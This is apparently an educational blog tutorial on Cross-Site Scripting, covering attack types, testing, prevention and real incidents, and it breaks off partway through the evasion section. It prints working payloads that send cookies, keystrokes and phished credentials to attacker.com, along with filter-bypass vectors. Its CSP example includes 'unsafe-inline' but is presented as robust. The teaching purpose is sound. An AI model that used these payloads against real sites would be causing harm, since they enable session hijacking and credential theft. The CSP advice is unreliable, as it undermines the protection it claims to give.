tutorials March 18, 2026 6 min read

Cross-Site Scripting (XSS) Attacks Explained with Real Examples

Cross-Site Scripting (XSS) attacks remain one of the most prevalent web vulnerabilities, affecting millions of websites worldwide. Whether you're a budding ethical hacker or a developer looking to secure your applications, understanding XSS is crucial for both offense and defense in cybersecurity.

XSS attacks occur when malicious scripts are injected into trusted websites, allowing attackers to execute code in users' browsers. These vulnerabilities consistently rank in the OWASP Top 10, making them essential knowledge for anyone serious about web security. In this comprehensive guide, we'll explore the different types of XSS attacks, demonstrate real-world examples, and show you how to both identify and prevent these dangerous vulnerabilities.

Understanding Cross-Site Scripting Fundamentals

Cross-Site Scripting attacks exploit the trust relationship between a user and a website. When a web application fails to properly validate, sanitize, or escape user input before displaying it in the browser, attackers can inject malicious JavaScript code that executes within the victim's browser context.

The core issue lies in how web browsers handle dynamic content. When a browser encounters JavaScript code within HTML, it executes that code automatically, assuming it's legitimate. XSS attacks abuse this behavior by tricking applications into including attacker-controlled scripts in their responses.

Key characteristics of XSS vulnerabilities:

They execute in the victim's browser, not on the server
They inherit the victim's permissions and session tokens
They can access cookies, local storage, and DOM elements
They bypass same-origin policy restrictions

Understanding these fundamentals is crucial because XSS attacks don't just display pop-up alerts—they can steal sensitive data, hijack user sessions, deface websites, or even install malware.

Types of XSS Attacks with Practical Examples

Reflected XSS (Non-Persistent)

Reflected XSS occurs when malicious scripts are immediately returned in the web application's response. The attack payload is typically embedded in URLs or form submissions and "reflected" back to the user without proper sanitization.

Example scenario: Consider a search functionality that displays the search term back to the user:

https://vulnerable-site.com/search?q=<script>alert('XSS')</script>

If the application displays the search term without encoding, the browser executes the JavaScript. A more realistic attack might steal session cookies:

<script>
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>

Attackers typically shorten malicious URLs using services like bit.ly to hide the payload and increase click-through rates in phishing campaigns.

Stored XSS (Persistent)

Stored XSS is more dangerous because the malicious payload is permanently stored on the target server. Every user who views the infected page triggers the attack, making it particularly effective for widespread compromise.

Common locations for stored XSS:

Comment sections and forums
User profile fields
Message boards and chat applications
Blog posts and article submissions

Here's an example payload for a comment field:

<img src="x" onerror="fetch('http://attacker.com/log.php?data='+btoa(document.cookie))">

This payload appears as a broken image but silently transmits the victim's cookies to the attacker's server using base64 encoding.

DOM-Based XSS

DOM-Based XSS occurs entirely within the client-side code. The vulnerability exists in the JavaScript that processes user input and updates the Document Object Model (DOM) without proper validation.

Consider this vulnerable JavaScript code:

var userInput = location.hash.substr(1);
document.getElementById('welcome').innerHTML = 'Hello ' + userInput;

An attacker could craft a URL like:

https://site.com/page.html#<img src=x onerror=alert('DOM XSS')>

The malicious code executes when the JavaScript processes the URL fragment, making this attack type particularly sneaky since it doesn't involve server-side processing.

Identifying XSS Vulnerabilities

Learning to identify XSS vulnerabilities is essential for both penetration testers and developers. The process involves systematic testing of input fields and analyzing how applications handle user data.

Manual Testing Techniques

Start with simple test payloads to identify potential injection points:

# Basic test vectors
<script>alert(1)</script>
'><script>alert(1)</script>
"><script>alert(1)</script>
javascript:alert(1)
<img src=x onerror=alert(1)>

Test these payloads in various locations:

URL parameters and form fields
HTTP headers (User-Agent, Referer)
File upload functionality
Search boxes and input fields

Advanced testing involves bypassing common filters:

# Bypassing basic filters
<ScRiPt>alert(1)</ScRiPt>
<script>ale<script>rt(1)</script>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">

Automated Tools and Techniques

While manual testing is crucial, automated tools can help discover XSS vulnerabilities more efficiently:

# Using XSStrike for automated XSS detection
python3 xsstrike.py -u "https://target.com/search?q=FUZZ"

# Burp Suite Intruder with XSS payloads
# Configure payload positions and load XSS wordlists

# OWASP ZAP scanning
zap-baseline.py -t https://target.com

Remember that automated tools often produce false positives, so manual verification of findings is essential for accurate reporting.

XSS Attack Vectors and Payloads

Understanding different attack vectors helps both in exploitation and defense. Modern XSS attacks go far beyond simple alert boxes, incorporating sophisticated techniques for data extraction and system compromise.

Cookie Stealing and Session Hijacking

One of the most common XSS attack objectives is stealing session cookies:

<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://attacker.com/collect', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('cookies=' + encodeURIComponent(document.cookie));
</script>

Keylogging and Form Hijacking

XSS can implement client-side keyloggers to capture sensitive information:

<script>
document.addEventListener('keydown', function(e) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'http://attacker.com/keylog', true);
    xhr.send('key=' + e.key + '&target=' + e.target.name);
});
</script>

Phishing and Social Engineering

XSS can create convincing phishing forms within trusted websites:

<div style="position:absolute; top:0; left:0; width:100%; height:100%; background:white; z-index:9999;">
<form action="http://attacker.com/phish">
<h2>Session Expired - Please Login Again</h2>
Username: <input name="user"><br>
Password: <input name="pass" type="password"><br>
<input type="submit" value="Login">
</form>
</div>

Prevention and Mitigation Strategies

Preventing XSS attacks requires a multi-layered approach combining input validation, output encoding, and security headers. Understanding these defenses is crucial for developers and security professionals.

Input Validation and Sanitization

Implement strict input validation on both client and server sides:

# Python example using html.escape
import html

def sanitize_input(user_input):
    # Remove or encode dangerous characters
    clean_input = html.escape(user_input, quote=True)
    return clean_input

# PHP example
$clean_input = htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

Content Security Policy (CSP)

Implement robust CSP headers to prevent unauthorized script execution:

Content-Security-Policy: default-src 'self'; 
script-src 'self' 'unsafe-inline' https://trusted-cdn.com; 
object-src 'none'; 
base-uri 'self';

Output Encoding

Always encode output based on the context where data will be displayed:

HTML Context: Use HTML entity encoding
JavaScript Context: Use JavaScript escaping
CSS Context: Use CSS escaping
URL Context: Use URL encoding

Real-World XSS Case Studies

Learning from real-world XSS incidents helps understand the practical impact of these vulnerabilities. Major platforms like Facebook, Twitter, and Google have all experienced significant XSS vulnerabilities that led to user data compromise.

In 2014, a stored XSS vulnerability in eBay affected millions of users when attackers injected malicious JavaScript into product listings. The attack remained undetected for months, highlighting the persistent nature of stored XSS vulnerabilities.

More recently, TikTok suffered from multiple XSS vulnerabilities that could have allowed attackers to take over user accounts by simply sending malicious links. These incidents demonstrate that even major technology companies struggle with XSS prevention.

Advanced XSS Techniques and Evasion

As web applications implement better defenses, attackers develop more sophisticated bypass techniques. Understanding these advanced methods is crucial for thorough security testing.

Filter Evasion Techniques

Modern XSS attacks often need to bypass various filtering mechanisms:

# Using alternate encodings
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">

#

  
    Want more cybersecurity tutorials delivered to your inbox?
    Subscribe Free →